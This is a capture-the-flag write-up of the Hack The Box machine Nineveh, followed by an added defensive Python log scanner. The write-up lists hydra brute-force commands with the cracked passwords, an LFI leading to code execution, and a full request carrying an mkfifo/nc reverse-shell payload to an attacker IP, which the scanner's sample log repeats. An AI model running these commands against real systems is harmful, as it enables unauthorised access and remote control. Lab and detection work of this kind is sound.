HTB Write-up Nineveh
nmap:
port 80 returned nothing but after configuring nineveh.htb to /etc/hosts, I got
Ran gobuster on the site.
Found a login page.
Possible usernames: admin, amrois
MySQL is installed..?
Tried different sqlmap options but had no luck.
Trying to crack it with hydra:
hydra -l admin -P ~/rockyou.txt 10.129.141.83 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 54
password = 1q2w3e4r5t
http admin page:
notes page has LFI vuln?
include(): it's executing the PHP code
This cool trick below encodes the php source code so we can read it
in this case it doesn't work.
HTTPS enum
admin@nineveh.htb
After running gobuster, I found a phpLiteAdmin v1.9 login form.
interesting warning.
hydra
hydra -l admin -P ~/rockyou.txt nineveh.htb https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:F=Incorrect"
Password123
Code execution on the site
Used this exploit: https://www.exploit-db.com/exploits/24044
now we can execute commands.
Sending it to burp and modify what we send to
GET /department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.131+4444+>/tmp/f
Got the reverse shell but no TTY.
cannot complete due to slowness of the machine!
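A defender's view of the manage.php request above, as an added example that is not part of the original write-up: a log check that flags a notes value resolving outside its expected directory and any extra parameter carrying shell metacharacters. The files/ directory, the ninevehNotes.txt name, the client addresses and the log lines are constructed assumptions; only the second request target comes from the write-up.

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qsl

ENDPOINT = "/department/manage.php"   # path from the write-up
EXPECTED_PARAMS = {"notes"}           # the include parameter seen in the write-up
ALLOWED_DIR = "files/"                # assumption: where legitimate notes live
SHELL_META = re.compile(r"[;|&<>`]|\$\(")
REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')

# Constructed log lines; the second request target is the one in the write-up.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /department/manage.php'
    '?notes=files/ninevehNotes.txt HTTP/1.1" 200 1532',
    '10.10.14.131 - - [01/Jan/2024:10:05:00 +0000] "GET /department/manage.php'
    '?notes=/var/tmp/ninevehNotes.php&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f'
    '|/bin/sh+-i+2>%261|nc+10.10.14.131+4444+>/tmp/f HTTP/1.1" 200 0',
    '192.0.2.11 - - [01/Jan/2024:10:06:00 +0000] "GET /department/manage.php'
    '?notes=files/../../outside.txt HTTP/1.1" 200 980',
]

def inspect_target(target):
    """Return findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    if parts.path != ENDPOINT:
        return []
    findings = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == "notes":
            # Allowlist after normalisation: absolute paths, ../ and
            # stream wrappers all fail the prefix test.
            if not posixpath.normpath(value).startswith(ALLOWED_DIR):
                findings.append("notes-outside-dir")
        elif name not in EXPECTED_PARAMS:
            findings.append(f"unexpected-param:{name}")
            if SHELL_META.search(value):   # checked after URL decoding
                findings.append(f"shell-metachar:{name}")
    return findings

def scan(lines):
    """Return (client, findings) for every log line that triggers a rule."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if m and (found := inspect_target(m.group(2))):
            hits.append((m.group(1), found))
    return hits

if __name__ == "__main__":
    for client, found in scan(SAMPLE_LOG):
        print(client, found)
```

The same allowlist test applied inside the application, before the include() call, is what closes the hole; the log check only surfaces attempts.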